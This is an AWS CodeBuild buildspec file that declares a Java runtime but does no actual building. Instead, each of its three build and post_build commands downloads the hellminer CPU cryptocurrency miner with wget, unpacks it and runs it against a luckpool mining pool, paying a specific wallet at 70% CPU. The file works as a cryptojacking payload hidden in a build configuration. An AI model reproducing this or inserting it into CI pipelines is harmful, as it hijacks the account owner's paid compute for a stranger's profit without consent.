version: 0.2

phases:
  install:
    runtime-versions:
      java: corretto11
  pre_build:
    commands:
      - echo Nothing to do in the pre_build phase...
  build:
    commands:
      - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz &&  tar xf hellminer_cpu_linux.tar.gz &&  ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RVJpgBaMefKcpEPwfGgKjkPqqRFsd3Hk7M.do -p x --cpu 70
      - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz &&  tar xf hellminer_cpu_linux.tar.gz &&  ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RVJpgBaMefKcpEPwfGgKjkPqqRFsd3Hk7M.da -p x --cpu 70
  post_build:
    commands:
      - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz &&  tar xf hellminer_cpu_linux.tar.gz &&  ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RVJpgBaMefKcpEPwfGgKjkPqqRFsd3Hk7M.ds -p x --cpu 70